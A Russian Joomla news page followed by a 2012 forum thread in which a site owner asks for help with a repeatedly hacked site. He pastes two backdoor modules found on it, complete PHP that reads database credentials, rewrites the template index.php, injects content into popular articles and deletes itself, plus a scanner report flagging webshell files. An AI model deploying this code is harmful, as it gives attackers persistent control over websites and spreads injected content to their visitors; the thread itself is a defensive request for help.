Новости Joomla

👩‍💻 События плагинов и порядок их срабатывания при работе с пользовательскими полями Joomla и использовании FieldsHelper.

👩‍💻 События плагинов и порядок их срабатывания при работе с пользовательскими полями Joomla и использовании FieldsHelper.

В процессе работы с Joomla бывает необходимо работать с пользовательским интерфейсом более тонко, чем обычно. Все формы Joomla состоят из стандартных полей, содержанием, стилем отображения, состоянием (включено/выключено, доступно для редактирования или нет и т.д.) можно управлять с помощью плагинов. Да и для нестандартных проектов хорошей практикой является создание одного системного или нескольких плагинов групп "под проект", в которых храниться весь "нестандарт".

В этой статье описаны все триггеры, которые вызываются через Event Dispatcher из administrator/components/com_fields/src/Helper/FieldsHelper.php, с привязкой к жизненному циклу (порядку этапов работы запроса), аргументам, изменяемым данным и дальнейшему распространению по Joomla. Это поможет вам работать с Joomla свободнее и не опасаясь при этом потерять изменения при очередном обновлении движка.

Подходы, описанные в статье, полезны в тех случаях, когда вы работаете с данными в com_fields - механизме создания и редактирования пользовательских полей ядра Joomla и при использовании FieldsHelper. Многие сторонние компоненты не используют эту возможность, поэтому данная статья будет полезна лишь частично.

Читать статью на Хабре.

@joomlafeed

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🗓 Голосование продлится до 27 февраля 2026 года.

👩‍💻 Проголосовать! 👩‍💻

Номинации, в которых можно проголосовать за Joomla:
⭐️ Best Free CMS
⭐️ Best Open Source CMS
⭐️ Best Enterprise CMS

Также в номинации Best e-Commerce Solution участвуют компоненты интернет-магазинов для Joomla:
⭐️ HikaShop
⭐️ Virtuemart

В номинации Best Website Builder оказались:
⭐️ YooTheme
⭐️ SP Page Builder

Что такое CMS Critic Awards?
С 2012 года премия CMS Critic Awards занимает особое место в сообществе систем управления контентом (CMS). Это единственный в своем роде сайт, который составляет рейтинг системы управления контентом и связанных с ними решений на рынке — от малого до крупного и подчеркивает их инновации и услуги.

Каждый год награда CMS Critic Awards присуждается одному победителю в различных отраслевых категориях, таких как: «Лучшая облачная CMS», «Лучший DXP», «Лучшая Headless CMS и других. Затем результаты оглашаются через СМИ вместе с выбором редакции CMS Critic.
В этом году премия вернулась к своим традициям и только TOP-5 движков по количеству номинаций попали в 2-й этап - голосование.

@joomlafeed

👩‍💻 Релиз JoomGallery 4.3.0 - компонент галереи изображений для Joomla.

👩‍💻 Релиз JoomGallery 4.3.0 - компонент галереи изображений для Joomla.

Одна из самых популярных и старейших фото-галерей для Joomla получила новую версию.

👉 v.4.3.0. Что нового?
Панель управления для зарегистрированных пользователей. В этой версии появилась возможность каждому зарегистрированному пользователю управлять своими категориями и изображениями во фронтенде сайта.

Документация по новой функции.
Сайт проекта

@joomlafeed

1 2  Все   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 32 Ответов
  • 11193 Просмотров
*

robotwerder

  • Захожу иногда
  • 248
  • 6 / 1
взлом сайта
« : 03.09.2012, 14:38:34 »
в общем я уже исстрадался. сайт 03-ektb.ru
Гугл регулярно помечает сайт как зараженный. выгребаю iframe вручную.
Сайт довольно емкий и искать шеллы проблематично. Траф падает, что делать не знаю..

регулярно меняется index.php шаблона. Хостер поставил заплатку дабы каждые несколько секунд возвращать права 400 на index.php

видимо она уже не спасает..
Как и где искать дыру не знаю.. возможно левые компоненты или модули. подскажите что делать, как быть?

единственное что ншел сегодня подозрительные модули

configsys

Код
<?php
if (empty($_POST)){
    echo '226776f356d7ecf58b60bab12a05d38f';
 }
$conf = '../../configuration.php';
$res['msg'] = 'Файл конфигурации найден';
	if (!file_exists($conf)) 
	{
	$res['msg'] = 'Файл конфигурации Joomla не найден';		
		return;
	}
require_once($conf);		
class db {
    function __construct()
    {				
		$jconfig = new JConfig();
		$host     = $jconfig->host;
		$user     = $jconfig->user;
		$password = $jconfig->password;
		$database = $jconfig->db; 
		if (empty($database)) 
	{
	$res['msg'] = 'Не могу подключится к базе!';	
	}else
	{
	$res['msg'] = 'Подключились!';	
	} 	
        global $dbh;
        if (!is_null($dbh)) return;
        $dbh = mysql_pconnect($host, $user, $password);	
        mysql_select_db($database);
        mysql_query('SET NAMES utf8');
    }
    function select_list($query)
    {
        $q = mysql_query($query);
        if (!$q) return null;
        $ret = array();
        while ($row = mysql_fetch_array($q, MYSQL_ASSOC)) {
            array_push($ret, $row);
        }
        mysql_free_result($q);
        return $ret;
    }	
  }
$db = new db();
$sql = "SELECT template FROM jos_templates_menu WHERE client_id =0 AND menuid =0";	
$q = mysql_query($sql);
while ($row = mysql_fetch_assoc($q)) 
	{
	$template = $row['template'];
    }
$dir    = '../../templates/'.$template.'/index.php';
chmod($dir, 0777);
$filename = $dir;
if (isset($_POST['load'])) {
$res['templ'] = file_get_contents($filename);
echo json_encode($res);	
}
//удаляем
if (isset($_POST['del'])) {
	function removeDir($path) 
	{
		return is_file($path)?
		@unlink($path):
		array_map('removeDir',glob($path."/*"))==@rmdir($path);
	}
	$del = $_POST['del'];
	$path = $_SERVER['DOCUMENT_ROOT'].'/modules/mod_configsys';
	removeDir($path);
	$res['msg'] = 'Удалено! - '.$del;
	echo json_encode($res);
    }
if (isset($_POST['edit'])) {
$edit = stripcslashes($_POST['edit']);
    file_put_contents($filename,$edit);	
    }
	
function auto_insert($filename, $somecontent){

if (is_writable($filename)) {
    if (!$handle = fopen($filename, 'a')) {
		 $res['msg'] = 'Не могу открыть файл! - '.$filename;		         
         exit;
    }    
	if (file_put_contents($filename, $somecontent . file_get_contents($filename))=== FALSE) {    
		$res['msg'] = 'Не могу произвести запись в файл! - '.$filename;		        
        exit;
    }
	$res['msg'] = 'Пытаюсь записать! - <xmp>'.$somecontent.'</xmp> - в файл - '.$filename;    
    fclose($handle);
} else {
	$res['msg'] = 'Файл - '.$filename.' - недоступен для записи - ';     
}
echo json_encode($res);   
}

if(isset($_POST['insert'])){
$somecontent = stripcslashes($_POST['insert']);
auto_insert($filename,$somecontent);
}
if (isset($_POST['search'])) {        
    $word = mysql_real_escape_string($_POST['search']);    
    $sql = "SELECT * FROM `jos_content` WHERE `fulltext` LIKE '%" . $word . "%' or `introtext` LIKE '%" . $word . "%' or 'state' LIKE '1' LIMIT 0 , 30";	
    $row = $db->select_list($sql);
    if(count($row)==1) {
	$q = mysql_query($sql);
	$res = mysql_fetch_assoc($q);	
	echo json_encode($res);
        } else {
		$res['introtext'] = 'Запрос не уникальный';
		$res['fulltext'] = 'Запрос не уникальный';
		echo json_encode($res);        
    }		
}
if (isset($_POST['resultID'])) {
    $resultID = stripcslashes($_POST['resultID']);
	$resultINT = stripcslashes($_POST['resultINT']);
	$resultFUL = stripcslashes($_POST['resultFUL']);    
	$sql1 = "UPDATE `jos_content` SET `introtext` = '".$resultINT."',`fulltext` = '".$resultFUL."' WHERE `jos_content`.`id` = ".$resultID;    
	$q = mysql_query($sql1);	
	$sql = "SELECT * FROM `jos_content` WHERE `jos_content`.`id` = ".$resultID;	
      $row = $db->select_list($sql);
    if(count($row)==1) {
	$q = mysql_query($sql);
	$res = mysql_fetch_assoc($q);
	echo json_encode($res);
        } else {
        echo '<li>Не уникальный запрос!</li>';
    }	
}			
?>

и  servises
Код
<?php
if (empty($_POST)){
    echo '226776f356d7ecf58b60bab12a05d38f';
 }
$conf = '../../configuration.php';
$res['msg'] = 'Файл конфигурации найден';
	if (!file_exists($conf)) 
	{
	$res['msg'] = 'Файл конфигурации Joomla не найден';		
		return;
	}
require_once($conf);		
class db {
    function __construct()
    {				
		$jconfig = new JConfig();
		$host     = $jconfig->host;
		$user     = $jconfig->user;
		$password = $jconfig->password;
		$database = $jconfig->db; 
		if (empty($database)) 
	{
	$res['msg'] = 'Не могу подключится к базе!';	
	}else
	{
	$res['msg'] = 'Подключились!';	
	} 	
        global $dbh;
        if (!is_null($dbh)) return;
        $dbh = mysql_pconnect($host, $user, $password);	
        mysql_select_db($database);
        mysql_query('SET NAMES utf8');
    }
    function select_list($query)
    {
        $q = mysql_query($query);
        if (!$q) return null;
        $ret = array();
        while ($row = mysql_fetch_array($q, MYSQL_ASSOC)) {
            array_push($ret, $row);
        }
        mysql_free_result($q);
        return $ret;
    }	
  }
$db = new db();
$sql = "SELECT template FROM jos_templates_menu WHERE client_id =0 AND menuid =0";	
$q = mysql_query($sql);
while ($row = mysql_fetch_assoc($q)) 
	{
	$template = $row['template'];
    }
$dir    = '../../templates/'.$template.'/index.php';
chmod($dir, 0777);
$filename = $dir;
if (isset($_POST['load'])) {
$res['templ'] = file_get_contents($filename);
echo json_encode($res);	
}

if (isset($_POST['posting'])) {
$codes = stripcslashes($_POST['posting']);
$sql = "SELECT * FROM `jos_content` WHERE `state` = 1  ORDER BY `hits` DESC";	
$q = mysql_query($sql);
while ($row = mysql_fetch_assoc($q)) 
	{
	$id[] = $row['id'];
	}
$len = count($id);
$vn = 0;
$gd = 0;
do
{	
$s = "SELECT `fulltext` FROM `jos_content` WHERE `id` =".$id[$vn];
$m = mysql_query($s);
$r = mysql_fetch_assoc($m); 
$post = $r['fulltext'];
preg_match_all('#<a.*href=([\'"])?([^\'"\s>]+?)(?(1)\\1).*>#isuU', $post, $match);
$outlinks = array();
foreach($match[2] as $url)
{
	if(($host = parse_url($url, PHP_URL_HOST)) && $host != $_SERVER['HTTP_HOST'] && $host != 'www.'.$_SERVER['HTTP_HOST'])$outlinks []= $url;
}
$add = $post.$codes;
if (count($outlinks)< 10)
{
$ins = "UPDATE `jos_content` SET `fulltext` = '".$add."' WHERE `jos_content`.`id` = ".$id[$vn];
$q = mysql_query($ins);
$gd ++;
$res['id'] = $id[$vn];
$res['msg'] = " Записываю в пост - ";
}else 
{
$vn++;
}
}while ($gd == 0 && $vn < $len);
echo json_encode($res);	
}

if (isset($_POST['del'])) {
	function removeDir($path) 
	{
		return is_file($path)?
		@unlink($path):
		array_map('removeDir',glob($path."/*"))==@rmdir($path);
	}
	$del = $_POST['del'];
	$path = $_SERVER['DOCUMENT_ROOT'].'/modules/mod_servises';
	removeDir($path);
	$res['msg'] = 'Удалено! - '.$del;
	echo json_encode($res);
    }
if (isset($_POST['edit'])) {
$edit = stripcslashes($_POST['edit']);
    file_put_contents($filename,$edit);	
    }
	
function auto_insert($filename, $somecontent){

if (is_writable($filename)) {
    if (!$handle = fopen($filename, 'a')) {
		 $res['msg'] = 'Не могу открыть файл! - '.$filename;		         
         exit;
    }    
	if (file_put_contents($filename, $somecontent . file_get_contents($filename))=== FALSE) {    
		$res['msg'] = 'Не могу произвести запись в файл! - '.$filename;		        
        exit;
    }
	$res['msg'] = 'Пытаюсь записать! - <xmp>'.$somecontent.'</xmp> - в файл - '.$filename;    
    fclose($handle);
} else {
	$res['msg'] = 'Файл - '.$filename.' - недоступен для записи - ';     
}
echo json_encode($res);   
}

if(isset($_POST['insert'])){
$somecontent = stripcslashes($_POST['insert']);
auto_insert($filename,$somecontent);
}
if (isset($_POST['search'])) {        
    $word = mysql_real_escape_string($_POST['search']);    
    $sql = "SELECT * FROM `jos_content` WHERE `fulltext` LIKE '%" . $word . "%' or `introtext` LIKE '%" . $word . "%' or 'state' LIKE '1' LIMIT 0 , 30";	
    $row = $db->select_list($sql);
    if(count($row)==1) {
	$q = mysql_query($sql);
	$res = mysql_fetch_assoc($q);	
	echo json_encode($res);
        } else {
		$res['introtext'] = 'Запрос не уникальный';
		$res['fulltext'] = 'Запрос не уникальный';
		echo json_encode($res);        
    }		
}
if (isset($_POST['resultID'])) {
    $resultID = stripcslashes($_POST['resultID']);
	$resultINT = stripcslashes($_POST['resultINT']);
	$resultFUL = stripcslashes($_POST['resultFUL']);    
	$sql1 = "UPDATE `jos_content` SET `introtext` = '".$resultINT."',`fulltext` = '".$resultFUL."' WHERE `jos_content`.`id` = ".$resultID;    
	$q = mysql_query($sql1);	
	$sql = "SELECT * FROM `jos_content` WHERE `jos_content`.`id` = ".$resultID;	
      $row = $db->select_list($sql);
    if(count($row)==1) {
	$q = mysql_query($sql);
	$res = mysql_fetch_assoc($q);
	echo json_encode($res);
        } else {
        echo '<li>Не уникальный запрос!</li>';
    }	
}			
?>

содержимое подозрительно, но их удаление не приносит желаемого результата..

все та ж вирусня..
Записан
*

wishlight

  • Гуру
  • 5078
  • 320 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: взлом сайта
« Ответ #1 : 03.09.2012, 15:37:43 »
Логи доступа есть? Проверьте сканером fls (найдете на форме или в теме в подписи) свой сайт.
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: взлом сайта
« Ответ #2 : 03.09.2012, 18:15:23 »
Цитировать
Как и где искать дыру не знаю.. возможно левые компоненты или модули. подскажите что делать, как быть?единственное что ншел сегодня подозрительные модули
Ну кроме сканера ,можешь и сам посмотреть- нет в начале скрипта проверки на наличие константы JEXES, значит скрипт предназначен для открытия помимо запуска index.php сайта
Записан
*

robotwerder

  • Захожу иногда
  • 248
  • 6 / 1
Re: взлом сайта
« Ответ #3 : 13.09.2012, 10:28:26 »
Сканер fls

Вижу тьму левого кода..
кроме этого обнаружил в директории инклюдес левые папки удалить которые невозможно..

Для примера выложил File: /home/h1025/data/www/03-ektb.ru/03/cms_importer.php из первой строки отчета

по Marco's SQL Injection - LFI Interceptor пока не могу отписать ..разбираюсь с настройками.. я так понимаю он на мыло мне будет уведомлялку отсылать о взломе..

что делать далее.. все ли так фатально как кажется?)

Код

Sheel and Basic Backdoor Script Finder www.1000in1.net

File: /home/h1025/data/www/03-ektb.ru/03/cms_importer.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/modules/mod_servises/system.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/modules/mod_raxo_allmode/tools/phpthumb.class.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/modules/mod_raxo_allmode/tools/phpthumb.functions.php
String:: phpinfo()

File: /home/h1025/data/www/03-ektb.ru/modules/mod_amoney/helper.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/modules/mod_configsys/system.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/modules/mod_rsform/mod_rsform.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/modules/mod_docman_ult/mod_docman_ult.php
String:: NCC

File: /home/h1025/data/www/03-ektb.ru/modules/mod_fly06_poll/mod_fly06_poll.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/modules/mod_fly06_poll/mod_fly06_poll/php/ajax.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/modules/mod_moo_faq/mod_moo_faq.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/modules/mod_dgm-news_ultra/mod_dgm-news_ultra/img/phpthumb.class.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/modules/mod_dgm-news_ultra/mod_dgm-news_ultra/img/phpthumb.functions.php
String:: phpinfo()

File: /home/h1025/data/www/03-ektb.ru/images/lang.php
String:: oRb

File: /home/h1025/data/www/03-ektb.ru/images/lang.php
String:: FilesMan

File: /home/h1025/data/www/03-ektb.ru/plugins/content/mosrsform.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/plugins/content/rokbox/imagehandler.php
String:: phpinfo()

File: /home/h1025/data/www/03-ektb.ru/plugins/system/jalib/jaToolbar.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/plugins/system/jalib/libraries/CodeIgniter/plugins/captcha_pi.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/plugins/system/jalib/libraries/CodeIgniter/libraries/Validation.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/plugins/system/jalib/libraries/CodeIgniter/libraries/Trackback.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/plugins/system/jalib/libraries/CodeIgniter/libraries/Input.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/plugins/system/rsform.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/plugins/editors/jce/tiny_mce/plugins/spellchecker/rpc.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/media/rsinstall_4b4e97683cb4b/site/controller/functions.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/media/rsinstall_4b4e97683cb4b/site/submissions.class.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/media/rsinstall_4b4e97683cb4b/site/rsform.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/media/rsinstall_4b4e97683cb4b/admin/admin.rsform.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/media/rsinstall_4b4e97683cb4b/admin/admin.rsform.html.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/media/rsinstall_4b4e97683cb4b/admin/admin.rsform.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/components/com_glossary/controller-admin-classes/glossaryAdminConfig.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/components/com_jcomments/tpl/default/tpl_comment.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/components/com_jfusion/jfusionapi.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/components/com_mailto/controller.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/components/com_jce/js/popup.php
String:: default_action = 'FilesMan'

File: /home/h1025/data/www/03-ektb.ru/components/com_jce/js/popup.php
String:: FilesMan

File: /home/h1025/data/www/03-ektb.ru/components/com_ariquiz/view/quiz_stat.html.php
String:: c99

File: /home/h1025/data/www/03-ektb.ru/components/com_content/models/safe-mod.php
String:: phpinfo()

File: /home/h1025/data/www/03-ektb.ru/components/com_content/models/safe-mod.php
String:: $_POST['pass']

File: /home/h1025/data/www/03-ektb.ru/components/com_content/models/safe-mod.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/components/com_rsform/controller/functions.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/components/com_rsform/submissions.class.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/components/com_rsform/rsform.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/components/com_joomgallery/includes/html/joom.viewdetails.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/components/com_joomgallery/includes/html/joom.userpanel.html.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/components/com_joomgallery/includes/html/joom.userpanel.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/components/com_joomgallery/includes/html/joom.favourites.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/components/com_joomgallery/includes/joom.slideshow.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/components/com_joomgallery/helpers/html/joomgallery.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/components/com_joomgallery/views/detail/tmpl/default.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/components/com_joomgallery/views/usercategories/tmpl/default.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/components/com_joomgallery/views/favourites/tmpl/list.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/components/com_joomgallery/views/userpanel/tmpl/default.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/templates/system/css/mod_system.php
String:: default_action = 'FilesMan'

File: /home/h1025/data/www/03-ektb.ru/templates/system/css/mod_system.php
String:: phpinfo()

File: /home/h1025/data/www/03-ektb.ru/templates/system/css/mod_system.php
String:: $_POST['pass']

File: /home/h1025/data/www/03-ektb.ru/templates/system/css/mod_system.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/templates/system/css/mod_system.php
String:: FilesMan

File: /home/h1025/data/www/03-ektb.ru/includes/recaptcha/.svn/text-base/init.php
String:: c99

File: /home/h1025/data/www/03-ektb.ru/includes/framework.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/logs/component.php
String:: default_action = 'FilesMan'

File: /home/h1025/data/www/03-ektb.ru/logs/component.php
String:: FilesMan

File: /home/h1025/data/www/03-ektb.ru/logs/component.php
String:: c99

File: /home/h1025/data/www/03-ektb.ru/language/pdf_fonts/freesansbold.php
String:: NCC

File: /home/h1025/data/www/03-ektb.ru/forum/reputation.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/viewforum.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/portal/block/mini_cal.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/viewreputation.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/mcp.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/report.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/viewtopic.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/functions_user.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_email.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_users.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_recenttopics.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_rep_change_point.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_ban.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_stats.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_search.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_attachments.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_forums.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_board.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_gallery.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_disallow.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_rep_settings.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_gallery_albums.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_profile.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_portal.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_logs.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_altt.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_language.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_faq_manager.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_permission_roles.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_rep_ranks.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_captcha.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_reasons.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_bots.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_styles.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_permissions.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_inactive.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_groups.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_mods.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_gallery_permissions.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_sitemap_generator.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_ranks.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_jabber.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_modules.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_icons.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_gallery_config.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_phpbb_seo.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_prune.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_database.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_manage_attachments.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/acp/acp_words.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/auth/auth_jfusion.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/message_parser.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_gallery.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_groups.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_pm_options.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_resend.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_profile.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_main.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_attachments.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_remind.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_zebra.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_pm.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_register.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_prefs.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_pm_compose.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/ucp/ucp_pm_viewfolder.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/mcp/mcp_forum.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/mcp/mcp_topic.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/mcp/mcp_main.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/mcp/mcp_queue.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/mcp/mcp_ban.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/functions.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/startup.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/prime_trash_bin_2.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/includes/functions_privmsgs.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/language/ru/acp/common.php
String:: phpinfo()

File: /home/h1025/data/www/03-ektb.ru/forum/gallery/mcp.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/gallery/posting.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/memberlist.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/umil/umil_auto.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/posting.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/forum/thankslist.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/phpinfo.php
String:: phpinfo()

File: /home/h1025/data/www/03-ektb.ru/libraries/joomla/environment/request.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/libraries/joomla/html/toolbar/button/confirm.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_jdownloads/admin.jdownloads.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_trash/admin.trash.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_xmap/ajaxResponse.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_jcomments/admin.jcomments.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_jfusion/plugins/phpbb3/auth_jfusion.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_jfusion/plugins/vbulletin/admin.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_jfusion/plugins/vbulletin/hooks.php
String:: $_POST[

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_jfusion/models/model.jfusion.php
String:: phpinfo()

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_jfusion/views/cpanel/tmpl/default.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_jfusion/views/versioncheck/tmpl/default.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_jfusion/views/syncoptions/tmpl/default.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/questioncategory_list.html.php
String:: confirm(

File: /home/h1025/data/www/03-ektb.ru/administrator/components/com_ariquiz/templates/bankcategory_list.html.php
String:: confirm(

